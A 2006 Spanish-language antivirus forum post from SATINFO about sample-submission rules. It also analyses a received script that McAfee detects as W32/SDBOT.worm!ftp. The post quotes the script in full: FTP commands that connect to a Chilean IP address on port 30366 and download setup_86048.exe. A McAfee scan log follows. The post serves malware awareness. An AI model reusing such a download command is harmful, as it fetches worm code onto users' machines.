W32/SDBOT.WORM!.FTP

[msc hotline sat]

Se ha recibido un mail a la cuenta de zonavirus@satinfo.es , sin indicar REFERENCUA, lo cual es básico para seguir el Tema en el foro, sino pasan a engrosar los recibidos a virus@satinfo.es que si indican numero de asociado se sigue e informa al usuario, y sino, se analiza y aplica como muestra anonima.



los foreros deben postear en un Tema del foro los problemas, y si se han de enviar focheros, se indica una REFERENCIA con la que contestar en el correspondiente Tema con el resultado del analisis. Las muestras pedidas por nuestras utilidades, deben enviarse a virus@satinfo.es



Como sea que en este caso era un simple script ante el que hasta salta el antivirus residente cuando se descargana, excepcionalmente y sin que sirva de precedente, se pega en este Tema y se explica para experiencia del foro:


[quote="en el script recibido se"]open 201.214.187.37 30366

user 1 1

get setup_86048.exe

quit [/quote]

Script detectado por McAfee como W32/SDBOT.worm!ftp que pretende abrir el port 30366 de una ip chilena y descargar el fichero setup_86048.exe a través de ftp, pero en lugar del hacerlo por el port 21, lo hace por el indicado 30366



_______________



Scan engine v4.4.00 for Win32.

Virus data file v4692 created Feb 08 2006

Scanning for 175787 viruses, trojans and variants.







02/09/2006 11:11:36





Options:

A: /ALL /REPORT A:\INFORME.TXT



Scanning A: []

Scanning A:\*.*

A:\i ... Found the W32/Sdbot.worm!ftp virus !!!



_________________





Seguramente es parte del script que usa este virus, para vuestra informacion



saludos



ms, 9-2-2006